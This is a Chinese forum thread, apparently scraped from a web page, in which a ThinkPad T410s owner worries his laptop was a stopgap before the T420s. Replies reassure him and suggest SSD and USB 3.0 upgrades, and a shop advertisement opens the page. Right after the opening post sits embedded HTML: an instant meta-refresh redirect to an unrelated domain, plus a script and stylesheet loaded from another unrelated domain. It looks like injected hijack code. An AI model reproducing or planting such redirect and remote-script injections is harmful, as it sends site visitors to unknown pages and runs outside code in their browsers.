开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

我得T410s是不是很差,难道就是个过渡产品?

好久不来论坛,发现都是T420S
我得T410S怎么办呀,   我是不是成了冤大头!
大家来说说!

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

T410s的最大软肋是1.8的硬盘,其他都还很不错
T410S 除了那个5400的硬盘和没有USB3.0,别的都很好,不过现在貌似这两个都可以解决,换装SSD,加USB3.0卡,这样一来就比T420S强多了。。。。

听说淘宝上有卖的100元左右  发表于 2011-5-26 23:23
T410s 你从那加USB3.0的转接卡?!  发表于 2011-5-26 22:33
不能这么讲,那T420s还是T430s的过渡品呢
电子产品这东西,没有终点的,楼主你要想开些~
当年的奔四不是过度产品么?酷睿2不是过度产品么?现在的i7一样是过渡产品
就是,就是,这个不可以这么想
事物都在不断发展和更新换代,连我们人都是,我们也是过渡人,我们的孩子也是过渡的。。。。lz蛋定吧,呵呵,410s还是不错的
T410S挺好啊,现在还小一万呢。
就是410s坚挺的很呢
早买早用挺好的啊
410s, 16:10的哦,还有做工确实杠杠的啊,比不带s的,对比下就知道了。而且真的是好轻啊。
淘宝 1.8寸 80g, intel g2 ssd。 800块,就是卖的最火的那个,可信不??
我也是410 刚买一个月就出420了 这玩意你要放宽心态 都会更新换代的 不要那么在意 
都会更新换代的 不要那么在意 功能上够用就行 永远追求新一代多烧钱啊
别给自己心里添堵 是不
我T410都用得挺滋润的,要不是嫌天热了背着重,打算用个三年。现在考虑T420S
intel 1年1代cpu。。。。
我T500用的都挺滋润的。。。。。。
我那R52都舍不得扔呢,用着也挺滋润的
T400的踏实

这种东西,够用就行,平时我就处理些文档、PPT、看个片、听个音乐,要那么高的配置没用呀,还伤钱。。。主要是看你的用途了。。。当然,别告诉我你买小黑专门玩游戏?那还不如买台式机呢。
电子产品永远买不到最新的,只能买到最适合的,用得顺手就好了 ,毕竟他只是一个工具而已。。。。。我也是T410S哦
回复 e_guangwei 的帖子

買wii之類的更加適合。。。
被照X光的鱼 发表于 2011-6-9 03:32
回复 e_guangwei 的帖子

買wii之類的更加適合。。。

PS3才是正道。。。
haha, 我在用T43呢,呵呵,而且越来越觉得超值了,都五年了。